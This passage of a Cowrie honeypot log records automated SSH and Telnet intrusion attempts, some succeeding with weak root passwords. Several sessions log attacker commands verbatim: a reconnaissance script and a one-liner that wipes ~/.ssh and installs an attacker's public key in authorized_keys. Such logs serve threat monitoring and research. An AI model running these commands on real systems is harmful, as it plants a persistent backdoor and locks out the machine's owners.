\t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.204673Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.205351Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.206634Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.207824Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.209166Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.211337Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.212173Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.212565Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.212921Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.213282Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.213676Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.214010Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.758917Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.759907Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.760903Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.session.closed","duration":12.787762880325317,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.828515Z","src_ip":"212.227.125.160","session":"0bdc6146a925"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46411,"dst_ip":"1.2.3.4","dst_port":23,"session":"df8bf2d47995","protocol":"telnet","message":"New connection: 212.227.125.160:46411 (1.2.3.4:23) [session: df8bf2d47995]","sensor":"my-vps","timestamp":"2025-08-26T00:36:32.999809Z"}
{"eventid":"cowrie.session.closed","duration":12.805385112762451,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:45.805101Z","src_ip":"212.227.125.160","session":"df8bf2d47995"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46726,"dst_ip":"1.2.3.4","dst_port":23,"session":"321828f77453","protocol":"telnet","message":"New connection: 212.227.125.160:46726 (1.2.3.4:23) [session: 321828f77453]","sensor":"my-vps","timestamp":"2025-08-26T00:36:46.033345Z"}
{"eventid":"cowrie.session.closed","duration":12.779181718826294,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:58.812428Z","src_ip":"212.227.125.160","session":"321828f77453"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47031,"dst_ip":"1.2.3.4","dst_port":23,"session":"5058ff5c3d5d","protocol":"telnet","message":"New connection: 212.227.125.160:47031 (1.2.3.4:23) [session: 5058ff5c3d5d]","sensor":"my-vps","timestamp":"2025-08-26T00:36:59.063457Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":34252,"dst_ip":"1.2.3.4","dst_port":22,"session":"c739f8437b13","protocol":"ssh","message":"New connection: 45.159.112.103:34252 (1.2.3.4:22) [session: c739f8437b13]","sensor":"my-vps","timestamp":"2025-08-26T00:37:07.686312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:37:07.687485Z","src_ip":"45.159.112.103","session":"c739f8437b13"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:37:07.802138Z","src_ip":"45.159.112.103","session":"c739f8437b13"}
{"eventid":"cowrie.login.failed","username":"test1","password":"test","message":"login attempt [test1/test] failed","sensor":"my-vps","timestamp":"2025-08-26T00:37:08.301000Z","src_ip":"45.159.112.103","session":"c739f8437b13"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:09.418085Z","src_ip":"45.159.112.103","session":"c739f8437b13"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":59252,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a9fc1467a24","protocol":"ssh","message":"New connection: 24.108.102.132:59252 (1.2.3.4:22) [session: 1a9fc1467a24]","sensor":"my-vps","timestamp":"2025-08-26T00:37:09.974976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:37:09.985718Z","src_ip":"24.108.102.132","session":"1a9fc1467a24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:37:10.149972Z","src_ip":"24.108.102.132","session":"1a9fc1467a24"}
{"eventid":"cowrie.login.success","username":"root","password":"usman123","message":"login attempt [root/usman123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:37:11.261096Z","src_ip":"24.108.102.132","session":"1a9fc1467a24"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:37:11.615748Z","src_ip":"24.108.102.132","session":"1a9fc1467a24"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:37:11.616449Z","src_ip":"24.108.102.132","session":"1a9fc1467a24"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:37:11.617395Z","src_ip":"24.108.102.132","session":"1a9fc1467a24"}
{"eventid":"cowrie.session.closed","duration":12.69020128250122,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:11.753586Z","src_ip":"212.227.125.160","session":"5058ff5c3d5d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:11.784557Z","src_ip":"24.108.102.132","session":"1a9fc1467a24"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:37:12.229834Z","src_ip":"24.108.102.132","session":"1a9fc1467a24"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:37:12.230536Z","src_ip":"24.108.102.132","session":"1a9fc1467a24"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:37:12.399146Z","src_ip":"24.108.102.132","session":"1a9fc1467a24"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:12.400009Z","src_ip":"24.108.102.132","session":"1a9fc1467a24"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":59258,"dst_ip":"1.2.3.4","dst_port":22,"session":"7918b69d696b","protocol":"ssh","message":"New connection: 24.108.102.132:59258 (1.2.3.4:22) [session: 7918b69d696b]","sensor":"my-vps","timestamp":"2025-08-26T00:37:12.564794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:37:12.570075Z","src_ip":"24.108.102.132","session":"7918b69d696b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:37:12.743525Z","src_ip":"24.108.102.132","session":"7918b69d696b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:37:13.448581Z","src_ip":"24.108.102.132","session":"7918b69d696b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:14.627805Z","src_ip":"24.108.102.132","session":"7918b69d696b"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":59268,"dst_ip":"1.2.3.4","dst_port":22,"session":"961af7e70c2f","protocol":"ssh","message":"New connection: 24.108.102.132:59268 (1.2.3.4:22) [session: 961af7e70c2f]","sensor":"my-vps","timestamp":"2025-08-26T00:37:14.767769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:37:14.784186Z","src_ip":"24.108.102.132","session":"961af7e70c2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:37:14.952099Z","src_ip":"24.108.102.132","session":"961af7e70c2f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:37:15.623629Z","src_ip":"24.108.102.132","session":"961af7e70c2f"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:15.786317Z","src_ip":"24.108.102.132","session":"1a9fc1467a24"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:15.791594Z","src_ip":"24.108.102.132","session":"961af7e70c2f"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":43812,"dst_ip":"1.2.3.4","dst_port":22,"session":"9056c35c06ca","protocol":"ssh","message":"New connection: 27.112.78.245:43812 (1.2.3.4:22) [session: 9056c35c06ca]","sensor":"my-vps","timestamp":"2025-08-26T00:37:22.662541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:37:22.663621Z","src_ip":"27.112.78.245","session":"9056c35c06ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:37:22.926970Z","src_ip":"27.112.78.245","session":"9056c35c06ca"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd123456789.","message":"login attempt [root/abcd123456789.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:37:24.017245Z","src_ip":"27.112.78.245","session":"9056c35c06ca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:37:24.600989Z","src_ip":"27.112.78.245","session":"9056c35c06ca"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:37:24.601704Z","src_ip":"27.112.78.245","session":"9056c35c06ca"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:37:24.602785Z","src_ip":"27.112.78.245","session":"9056c35c06ca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:24.865092Z","src_ip":"27.112.78.245","session":"9056c35c06ca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:37:25.409245Z","src_ip":"27.112.78.245","session":"9056c35c06ca"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:37:25.409889Z","src_ip":"27.112.78.245","session":"9056c35c06ca"}
